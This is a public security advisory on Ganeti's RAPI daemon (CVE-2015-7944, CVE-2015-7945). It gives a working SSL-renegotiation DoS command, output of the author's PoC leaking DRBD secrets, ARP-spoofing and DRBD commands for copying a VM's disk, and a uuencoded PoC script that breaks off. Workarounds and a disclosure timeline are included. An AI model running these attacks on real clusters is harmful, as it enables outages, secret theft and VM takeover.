-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ## Advisory Information Title: Ganeti Security Advisory (DoS, Unauthenticated Info Leak) Advisory URL: https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt Blog URL: https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html Date published: 2016-01-05 Vendors contacted: Google, MITRE Organization contacted: Riseup Release mode: Released CVE: CVE-2015-7944, CVE-2015-7945 CNNVD: no current CNNVD ## Product Description Ganeti is a virtual machine cluster management tool developed by Google. The solution stack uses either Xen or KVM as the virtualization platform, LVM for disk management, and optionally DRBD for disk replication across physical hosts. ## Vulnerabilities Summary Ganeti has security problems in the default install (with DRBD) and the default configuration due to old libraries and design problem, even if the security level in Ganeti seems to be high. These problems affect every versions until the last released version. The Ganeti API Daemon is open on every interface by default and an attacker can DoS this daemon. It is also possible to abuse this deamon to retrieve information, such as network topology, DRBD secrets... A PoC is provided to automaticaly retrieve sensitive information and a possible scenario, allowing to take over Virtual Machines remotely, is provided (which worked in my lab in certain conditions). ## Details - CVE-2015-7944 - Unauthenticated Remote DoS Ganeti is prone to a SSL DoS with SSL renegociation against the RAPI Daemon: user@kali:~$ (sleep 1; while true;do echo R;done) | openssl s_client -connect 10.105.1.200:5080 CONNECTED(00000003) depth=0 CN = ganeti.example.com verify error:num=18:self signed certificate verify return:1 depth=0 CN = ganeti.example.com verify return:1 - --- Certificate chain 0 s:/CN=ganeti.example.com i:/CN=ganeti.example.com - --- Server certificate - -----BEGIN CERTIFICATE----- [...] - -----END CERTIFICATE----- subject=/CN=ganeti.example.com issuer=/CN=ganeti.example.com - --- No client certificate CA names sent - --- SSL handshake has read 1003 bytes and written 625 bytes - --- New, TLSv1/SSLv3, Cipher is AES256-GCM-SHA384 Server public key is 2048 bit Secure Renegotiation IS supported Compression: NONE Expansion: NONE SSL-Session: Protocol : TLSv1.2 Cipher : AES256-GCM-SHA384 Session-ID: D75BCF369143CD008D693B022B967149AF0BD420DE385C51227A1921CD29360D Session-ID-ctx: Master-Key: 7DDD57FD479AE6555D1D42CF2B15B8857C28430189EC5C1331C75C4253E4A9F0FC0672EE2F2438CD055328C5A46C4F5F Key-Arg : None PSK identity: None PSK identity hint: None SRP username: None TLS session ticket lifetime hint: 300 (seconds) TLS session ticket: 0000 - 10 ad 69 39 76 6c 2e 37-cf e7 c2 2c 5f f0 e0 20 ..i9vl.7...,_.. 0010 - 5d 85 5a 79 82 20 6a 1d-f1 6e 51 f5 f2 f7 c6 cf ].Zy. j..nQ..... 0020 - c1 85 2d 42 5a 1c 53 b4-cb db de 65 04 2a 02 da ..-BZ.S....e.*.. 0030 - 5c 7d 82 ef 56 4a a4 a1-88 bd 87 fd af 25 e3 2e \}..VJ.......%.. 0040 - 28 68 04 a4 01 22 88 72-30 0b 79 1c 75 61 88 d5 (h...".r0.y.ua.. 0050 - c9 f3 e2 0b 02 50 bf c8-29 ac d9 36 f3 76 bd 8b .....P..)..6.v.. 0060 - 05 e0 d3 a9 f3 8b 8b 11-ef 19 2f 94 92 30 94 58 ........../..0.X 0070 - aa 64 ba 3f a4 fc 15 4b-74 11 3b c3 c7 e7 d4 33 .d.?...Kt.;....3 0080 - dd 76 e9 e1 1b 3a 95 c4-50 28 4f 9e bc cc cb f3 .v...:..P(O..... 0090 - bf 4d 60 92 64 00 af 67-c0 e9 69 e3 98 54 21 dc .M`.d..g..i..T!. Start Time: 1438121399 Timeout : 300 (sec) Verify return code: 18 (self signed certificate) - --- RENEGOTIATING depth=0 CN = ganeti.example.com verify error:num=18:self signed certificate verify return:1 depth=0 CN = ganeti.example.com verify return:1 RENEGOTIATING depth=0 CN = ganeti.example.com verify error:num=18:self signed certificate verify return:1 depth=0 CN = ganeti.example.com verify return:1 RENEGOTIATING depth=0 CN = ganeti.example.com verify error:num=18:self signed certificate verify return:1 depth=0 CN = ganeti.example.com verify return:1 RENEGOTIATING [...] - From my test, 1 thread takes 75% of CPU. `top` on the main server (10.105.1.200): 19734 gnt-rapi 20 0 148980 35364 4696 R 76.8 3.7 0:04.12 ganeti-rapi Multiple threads will eat all the available CPUs and will likely DoS ganeti: 21280 gnt-rapi 20 0 148980 35364 4696 R 35.3 3.7 0:05.06 ganeti-rapi 20968 gnt-rapi 20 0 148980 35364 4696 R 33.4 3.7 0:09.92 ganeti-rapi 20969 gnt-rapi 20 0 148980 35364 4696 R 32.4 3.7 0:09.95 ganeti-rapi 21282 gnt-rapi 20 0 148980 35364 4696 R 32.4 3.7 0:04.53 ganeti-rapi 21281 gnt-rapi 20 0 148980 35364 4696 R 31.4 3.7 0:04.78 ganeti-rapi An attacker can use tools from THC to perform SSL DoS too (openssl was the fastest solution out of the box): https://www.thc.org/thc-ssl-dos/ ## Details - CVE-2015-7945 - Unauthenticated Remote Information Disclosure This vulnerability allows an attacker to retrieve data using information disclosure, allowing him, depending on the configuration, to remotely hack VMs. A PoC (GHETTO-BLASTER which works in Linux (Debian, Kali) and FreeBSD) is provided as a base64-encoded file to this email. This PoC is also available here: https://pierrekim.github.io/advisories/GHETTO-BLASTER. I. Design Security Problem with the RAPI Daemon In the Ganeti master node, when using /usr/sbin/gnt-network, a non-root user can't get information (debian-01 is the ganeti master node): user@debian-01:~$ /usr/sbin/gnt-network list It seems you don't have permissions to connect to the master daemon. Please retry as a different user. user@debian-01:~$ This is common for all gnt-tools and seems to be a security design. It appears Genati by default is too open when using the RAPI daemon and this daemon listens on every interface by default. For example, the network configuration can be extracted from jobs using the RAPI daemon without authentication. I wrote a tool, "GHETTO-BLASTER", to industrialize the process: user@kali:~$ ./GHETTO-BLASTER http:// Example: https:// 2015 Pierre Kim @PierreKimSec https://pierrekim.github.io DO WHAT THE FUCK YOU WANT TO PUBLIC LICENSE user@kali:~$ ./GHETTO-BLASTER http://10.105.1.200 [...] [a lot of output] [...] user@kali:~$ ls -l 2-networks 2-networks-test-priv 2-networks-test-pub -rw-r--r-- 1 user user 228 Jun 20 13:37 2-networks -rw-r--r-- 1 user user 882 Jun 20 13:37 2-networks-test-priv -rw-r--r-- 1 user user 881 Jun 20 13:37 2-networks-test-pub user@kali:~$ cat 2-networks 2-networks-test-priv 2-networks-test-pub $VAR1 = [ { 'name' => 'test-priv', 'uri' => '/2/networks/test-priv' }, { 'uri' => '/2/networks/test-pub', 'name' => 'test-pub' } ]; $VAR1 = { 'mtime' => '1333027652.67126', 'gateway' => undef, 'network6' => undef, 'inst_list' => [], 'mac_prefix' => undef, 'serial_no' => 1, 'free_count' => 254, 'name' => 'test-priv', 'map' => 'X..............................................................................................................................................................................................................................................................X', 'gateway6' => undef, 'external_reservations' => '192.168.1.0, 192.168.1.255', 'uuid' => '506ad97b-2276-43f4-ae27-e6bbb97f28ff', 'ctime' => '1333027652.67126', 'reserved_count' => 2, 'network' => '192.168.1.0/24', 'group_list' => [], 'tags' => [] }; $VAR1 = { 'mac_prefix' => undef, 'inst_list' => [], 'network6' => undef, 'mtime' => '1333027641.64375', 'gateway' => undef, 'map' => 'X..............................................................................................................................................................................................................................................................X', 'free_count' => 254, 'name' => 'test-pub', 'serial_no' => 1, 'reserved_count' => 2, 'network' => '192.168.0.0/24', 'ctime' => '1333027641.64375', 'gateway6' => undef, 'uuid' => '48b34199-2d23-46f0-b4aa-2539cb4a7780', 'external_reservations' => '192.168.0.0, 192.168.0.255', 'group_list' => [], 'tags' => [] }; user@kali:~$ It's possible to map the network and to retrieve sensible secrets. Other interesting information: osparams_secret is readable in jobs using the access to RAPI. II. Using this information disclosure to hack VMs: By default, /var/lib/ganeti/config.data(640, gnt-masterd:gnt-confd) contains the secret key for DRBD replication. A remote user or even a local non-root (or non gnt-masterd user) can't get the configuration of DRBD. This key can be extracted from jobs by abusing the RAPI daemon without authentication. After running GHETTO-BLASTER, you will have a lot of files: user@kali:~$ ls 1-list-collectors 2-jobs-121 2-jobs-154 2-jobs-187 2-jobs-219 2-jobs-251 2-jobs-284 2-jobs-47 2-jobs-8 1-report-all 2-jobs-122 2-jobs-155 2-jobs-188 2-jobs-22 2-jobs-252 2-jobs-285 2-jobs-48 2-jobs-80 2-features 2-jobs-123 2-jobs-156 2-jobs-189 2-jobs-220 2-jobs-253 2-jobs-286 2-jobs-49 2-jobs-81 2-info 2-jobs-124 2-jobs-157 2-jobs-19 2-jobs-221 2-jobs-254 2-jobs-287 2-jobs-5 2-jobs-82 2-instances 2-jobs-125 2-jobs-158 2-jobs-190 2-jobs-222 2-jobs-255 2-jobs-288 2-jobs-50 2-jobs-83 2-instances-vm-01 2-jobs-126 2-jobs-159 2-jobs-191 2-jobs-223 2-jobs-256 2-jobs-289 2-jobs-51 2-jobs-84 2-instances-vm-01-info-jobs 2-jobs-127 2-jobs-16 2-jobs-192 2-jobs-224 2-jobs-257 2-jobs-29 2-jobs-52 2-jobs-85 2-instances-vm-02.example.com 2-jobs-128 2-jobs-160 2-jobs-193 2-jobs-225 2-jobs-258 2-jobs-290 2-jobs-53 2-jobs-86 2-instances-vm-02.example.com-info-jobs 2-jobs-129 2-jobs-161 2-jobs-194 2-jobs-226 2-jobs-259 2-jobs-291 2-jobs-54 2-jobs-87 2-jobs 2-jobs-13 2-jobs-162 2-jobs-195 2-jobs-227 2-jobs-26 2-jobs-292 2-jobs-55 2-jobs-88 2-jobs-0 2-jobs-130 2-jobs-163 2-jobs-196 2-jobs-228 2-jobs-260 2-jobs-293 2-jobs-56 2-jobs-89 2-jobs-1 2-jobs-131 2-jobs-164 2-jobs-197 2-jobs-229 2-jobs-261 2-jobs-294 2-jobs-57 2-jobs-9 2-jobs-10 2-jobs-132 2-jobs-165 2-jobs-198 2-jobs-23 2-jobs-262 2-jobs-295 2-jobs-58 2-jobs-90 2-jobs-100 2-jobs-133 2-jobs-166 2-jobs-199 2-jobs-230 2-jobs-263 2-jobs-296 2-jobs-59 2-jobs-91 2-jobs-101 2-jobs-134 2-jobs-167 2-jobs-2 2-jobs-231 2-jobs-264 2-jobs-297 2-jobs-6 2-jobs-92 2-jobs-102 2-jobs-135 2-jobs-168 2-jobs-20 2-jobs-232 2-jobs-265 2-jobs-298 2-jobs-60 2-jobs-93 2-jobs-103 2-jobs-136 2-jobs-169 2-jobs-200 2-jobs-233 2-jobs-266 2-jobs-299 2-jobs-61 2-jobs-94 2-jobs-104 2-jobs-137 2-jobs-17 2-jobs-201 2-jobs-234 2-jobs-267 2-jobs-3 2-jobs-62 2-jobs-95 2-jobs-105 2-jobs-138 2-jobs-170 2-jobs-202 2-jobs-235 2-jobs-268 2-jobs-30 2-jobs-63 2-jobs-96 2-jobs-106 2-jobs-139 2-jobs-171 2-jobs-203 2-jobs-236 2-jobs-269 2-jobs-31 2-jobs-64 2-jobs-97 2-jobs-107 2-jobs-14 2-jobs-172 2-jobs-204 2-jobs-237 2-jobs-27 2-jobs-32 2-jobs-65 2-jobs-98 2-jobs-108 2-jobs-140 2-jobs-173 2-jobs-205 2-jobs-238 2-jobs-270 2-jobs-33 2-jobs-66 2-jobs-99 2-jobs-109 2-jobs-141 2-jobs-174 2-jobs-206 2-jobs-239 2-jobs-271 2-jobs-34 2-jobs-67 2-networks 2-jobs-11 2-jobs-142 2-jobs-175 2-jobs-207 2-jobs-24 2-jobs-272 2-jobs-35 2-jobs-68 2-nodes 2-jobs-110 2-jobs-143 2-jobs-176 2-jobs-208 2-jobs-240 2-jobs-273 2-jobs-36 2-jobs-69 2-nodes-debian-01 2-jobs-111 2-jobs-144 2-jobs-177 2-jobs-209 2-jobs-241 2-jobs-274 2-jobs-37 2-jobs-7 2-nodes-debian-01-role 2-jobs-112 2-jobs-145 2-jobs-178 2-jobs-21 2-jobs-242 2-jobs-275 2-jobs-38 2-jobs-70 2-nodes-debian-02 2-jobs-113 2-jobs-146 2-jobs-179 2-jobs-210 2-jobs-243 2-jobs-276 2-jobs-39 2-jobs-71 2-nodes-debian-02-role 2-jobs-114 2-jobs-147 2-jobs-18 2-jobs-211 2-jobs-244 2-jobs-277 2-jobs-4 2-jobs-72 2-os 2-jobs-115 2-jobs-148 2-jobs-180 2-jobs-212 2-jobs-245 2-jobs-278 2-jobs-40 2-jobs-73 version 2-jobs-116 2-jobs-149 2-jobs-181 2-jobs-213 2-jobs-246 2-jobs-279 2-jobs-41 2-jobs-74 2-jobs-117 2-jobs-15 2-jobs-182 2-jobs-214 2-jobs-247 2-jobs-28 2-jobs-42 2-jobs-75 2-jobs-118 2-jobs-150 2-jobs-183 2-jobs-215 2-jobs-248 2-jobs-280 2-jobs-43 2-jobs-76 2-jobs-119 2-jobs-151 2-jobs-184 2-jobs-216 2-jobs-249 2-jobs-281 2-jobs-44 2-jobs-77 2-jobs-12 2-jobs-152 2-jobs-185 2-jobs-217 2-jobs-25 2-jobs-282 2-jobs-45 2-jobs-78 2-jobs-120 2-jobs-153 2-jobs-186 2-jobs-218 2-jobs-250 2-jobs-283 2-jobs-46 2-jobs-79 Files contain DRBD secrets: user@kali:~$ grep secret *|tail -n 5 2-jobs-80: 'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06' 2-jobs-82: 'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06' 2-jobs-84: 'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06', 2-jobs-85: 'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06', 2-jobs-86: 'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06', user@kali:~$ The key is confirmed by using `drbdsetup show` as root in the Ganeti master node: root@debian-01:~# drbdsetup show resource resource0 { options { } net { cram-hmac-alg "md5"; shared-secret "eb1fe92b20aef58ed0570df49a38f82cf5a72d06"; after-sb-0pri discard-zero-changes; after-sb-1pri consensus; } _remote_host { address ipv4 10.105.1.201:11000; } _this_host { address ipv4 10.105.1.200:11000; volume 0 { device minor 0; disk "/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data"; meta-disk "/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta"; disk { size 8388608s; # bytes resync-rate 61440k; # bytes/second } } } } root@debian-01:~# By digging more, one of the jobs file (2-jobs-280) contains the DRDB configuration: [...] 'drbd_info' => { 'port' => 11000, 'primary_minor' => 0, 'secondary_node' => 'debian-02', 'secondary_minor' => 0, 'secret' => 'eb1fe92b20aef58ed0570df49a38f82cf5a72d06', 'primary_node' => 'debian-01' }, [...] As stated in http://docs.ganeti.org/ganeti/current/html/security.html: DRBD connections are protected from erroneous connections to other machines (as may happen due to software issues), and from accepting connections from other machines, by using a shared secret, exchanged via RPC requests from the master to the nodes when configuring the device. We recovered the secret of DRBD, the port used and the nodes without authentication. Other files contain the LVM VG and the LVM LG names! It's enough to start playing with DRDB from an attacker side. III. DRBD Madness Now, it's time for DRBD Feng Shui! Getting the File System of a VM: o By doing ARP spoofing in the same LAN: We will impersonate 10.105.1.201 by doing ARP poisoning and using a valid drbd.conf thank to the parameters provided by the RAPI daemon: root@kali# cat etc-drbd.conf include "drbd.d/global_common.conf"; include "drbd.d/*.res"; resource resource0 { volume 0 { device minor 0; disk "/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data"; meta-disk "/dev/xenvg-vg/41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta"; } protocol C; net { cram-hmac-alg "md5"; shared-secret "eb1fe92b20aef58ed0570df49a38f82cf5a72d06"; after-sb-0pri discard-zero-changes; after-sb-1pri consensus; } on target { address 10.105.1.200:11000; } on kali { address 10.105.1.201:11000; } } root@kali# vgremove xenvg-vg 2>/dev/null root@kali# dd if=/dev/zero of=/dev/sdb bs=1024 count=1024 root@kali# pvcreate /dev/sdb root@kali# vgcreate xenvg-vg /dev/sdb root@kali# lvcreate --name 41975138-516e-4f8d-9c39-f6716a89efa2.disk0_data --size 4G xenvg-vg root@kali# lvcreate --name 41975138-516e-4f8d-9c39-f6716a89efa2.disk0_meta --size 128M xenvg-vg root@kali# cp etc-drbd.conf /etc/drbd.conf root@kali# drbdadm create-md resource0 root@kali# drbdadm up resource0 || root@kali# ifconfig eth0 10.105.1.201 netmask 255.255.255.0 root@kali# drbdadm attach resource0 root@kali# drbdadm connect resource0 root@kali# cat /proc/drbd version: 8.4.3 (api:1/proto:86-101) srcversion: 1A9F77B1CA5FF92235C2213 0: cs:SyncTarget ro:Secondary/Primary ds:Inconsistent/UpToDate C r----- ns:0 nr:916568 dw:916472 dr:0 al:0 bm:55 lo:2 pe:0 ua:2 ap:0 ep:1 wo:f oos:3277832 [===>................] sync'ed: 22.0% (3277832/4194304)K finish: 0:08:33 speed: 6,368 (5,912) want: 4,520 K/sec root@kali# echo "wow synchronisation in progress !" wow synchronisation in progress ! root@kali# After 10min of synchronisation, an attacker will have a perfect copy of the targeted VM File System using DRDB replication. It's also possible to write information in the File System (like adding SSH keys). Rooting VMs by adding ssh keys and by doing s/PermitRootLogin No/PermitRootLogin Yes/ is left as a exercise to the reader. o Other methods of MiTM exist and are left as a exercise for the reader. ## Proposed Workarounds by the Security Researcher At first, I think these steps must be done to improve the security of ganeti: 1/ Forcing the RAPI to listen to 127.0.0.1 instead of 0.0.0.0. This can be done by adding by default to /etc/default/ganeti: RAPI_ARGS="-b 127.0.0.1" Listening to 127.0.0.1 for ganeti-mond is a good step too (it listens to 0.0.0.0:1815/tcp) 2/ Adding an authentication by default for the RAPI daemon (not only for writing access but for reading access too) 3/ Filtering the output of the jobs to avoid leaking secrets. Note that the immediate step is to change the secrets used for DRBD and to be sure nobody had access to the DRBD blocks, allowing a compromise of all the VMs. 4/ Disabling SSL renegociation and updating the default ciphers. A personal note: as deploying a working Ganeti platform is very complicated, attackers will likely giving up before having a working Ganeti platform to study :) ## Vendor Response Update to the latest version of Ganeti. Read details about mitigation measures here: https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg ## Report Timeline * Jul 30, 2015 : Pierre Kim sends an email to security@ganeti.org asking for a GPG key, email bounced * Jul 30, 2015 : Pierre Kim asks Google Security Team if Ganeti is elligible to the Google Vulnerability Reward Program * Jul 30, 2015 : Pierre Kim sends an email to Ganeti Team for a working security contact * Jul 30, 2015 : Guido Trotter replies by saying to use opensource-ganeti@google.com * Aug 1, 2015: Security@google.com confirms it's out of scope * Aug 4, 2015: Pierre Kim says the exploits are critical and Ganeti is widely used by Google * Aug 11, 2015: Advisories and PoC sent to Google Security Team and Pierre Kim asks Google Security Team to contact Riseup, as they are using Ganeti * Aug 12, 2015: Google Security Team transmitted the information to Ganeti Team * Aug 20, 2015: Google Security Team is working on the scope and the impact of the report * Aug 27, 2015: Google Security Team decided is not within scope of the VRP program but a research grant is awarded as "Security improvement efficacy research" * Aug 28, 2015: Pierre Kims provides information about DRBDv8, DRBDv9. Pierre Kim asks information about the DoS, the condition for the rewards and asks if Riseup was contacted * Sep 10, 2015: Google Security Team confirms they will not contact Riseup and that they ask "that you act and communicate in good faith, use your own best judgement, and we'll do everything we can to work with you to resolve vulnerabilities in a reasonable timeframe" * Oct 6, 2015: Pierre Kim asks for update about the security patchs and informs he will contact Riseup * Oct 6, 2015: Riseup is contacted * Oct 16, 2015: Google Security Team confirm releases end of October and asks about CVEs from MITRE. The Ganeti Bug #1135 is created * Oct 17, 2015: Pierre Kim asks Google to ask MITRE CVE assignments and proposes to contact CNNVD to get a CNNVD entry * Oct 17, 2015: Google Security Team contacted MITRE to get CVEs * Oct 23, 2015: Google Security Team has 2 CVE: CVE-2015-7944 and CVE-2015-7945 * Nov 3, 2015: Pierre Kim informs new security with a DoS with the jobs creation * Nov 5, 2015: Ganeti Team has rate-limit to 20 concurrent jobs creation, which limit the problems and declares the patch will be very soon * Nov 17, 2015: Ganeti Team announces new releases next week * Nov 23, 2015: a pre-advisory is sent to Ganeti Team and Google Security Team * Dec 30, 2015: Ganeti Team releases a security advisory * Jan 05, 2015: A public advisory is sent to security mailing lists ## Credit These vulnerabilities were found by Pierre Kim (@PierreKimSec). ## Greetings Big thanks to my friends Alexandre Torres, Jordan, Jerome and Stephen. Thanks to Google Security Team which coordinated the issues by contacting MITRE and the different parties. ## References https://pierrekim.github.io/advisories/2016-ganeti-0x00.txt https://pierrekim.github.io/blog/2016-01-05-Ganeti-Info-Leak-DoS.html http://www.ocert.org/advisories/ocert-2015-012.html https://groups.google.com/forum/#!topic/ganeti/9bLyzwmmvdg ## PoC - GHETTO-BLASTER begin 700 GHETTO-BLASTER M(R$O=7-R+V)I;B]P97)L("UW"@IU2`D:5]W86YT7W)E861A8FQE7VIS;VX@/2`Q.PH*:68@*"$H9&5F M:6YE9"@D05)'5ELP72DI*0I["B`@<')I;G0@(B0P(&AT='`Z+R\\:7!?;V9? M9V%N971I7W)A<&D^7&Y<;B(["B`@<')I;G0@(B`@17AA;7!L93I<;B(["B`@ M<')I;G0@(B`@("!H='1P'0O8V]P>6EN M9R\^7&Y<;B(["F5X:70@*#$I(&EF("@A*&1E9FEN960H)$%21U9;,%TI*2D[ M"@IM>2`D8F%S95]UR`B M=7)L(B`]/B`B+S(O:6YF;R(L("`@("`B;W5T<'5T7V9I;&4B(#T^("(R+6EN M9F\B+"`@("`@(")IPH@("9G2!'2$545$\M0DQ!4U1%4B!A($=A;F5T:2!D871A(&%G2`DR1C;61]+3Y[(F]U='!U=%]F:6QE(GTL("1B87-I8U]C;61S>R1C;61]+3Y[ M(FES7VIS;VXB?2D["B`@?0H*("`F<&%R2`D M;7-G(#T@)%];,%T["@H@("1MPH@(&UY("1R97,["B`@;7D@)&)APH@(&UY("1R97,@/2`F9V5T M7W1AR1D M96-O9&5D7VIS;VY]*0H@('L*("`@("1R97,@/2`F9V5T7W1AR=U MR=I9"=]*3L*"B`@("`DR=I9"=]+6EN9F\M:F]BR=I9"=]+VEN9F\M:F]B2`DPH@("`@)')E MR=N86UE)WTB+"`Q+"`D9&%T M82T^>R=U2`D2`D9&5C;V1E9%]J M2`D9&%T M82`H0'LD9&5C;V1E9%]JR=N86UE)WTB+"`Q+"`D9&%T82T^>R=UPH@(&UY("1R97,@/2`F9V5T7W1A M2`D9&%T82`H0'LD9&5C;V1E9%]JR=I9"=]*3L*"B`@("`DR=I9"=]+7)O;&4B+"`P+"`B;F]D97,O)&1A M=&$M/GLG:60G?2UR;VQE(BD["B`@?0I]"@H*2`D9&5C;V1E9%]JPH@("`@)'1O=&%L7VIO8G,@/2`D9&%T82T^>R=I9"=](&EF("@D9&%T82T^ M>R=I9"=](#X@)'1O=&%L7VIO8G,I.PH@('T*"B`@9F]R(&UY("1I("@P("XN M("1T;W1A;%]J;V)S*0H@('L*("`@("1R97,@/2`F9V5T7W1APH@(&UY("1T M87)G970@/2`D7ULP73L*("!M>2`D97)R;W)?;VL@/2`D7ULQ73L*("!M>2`H M)'5A+"`D'D["B`@)'5A+3YT:6UE;W5T*#$P M*3L*("`D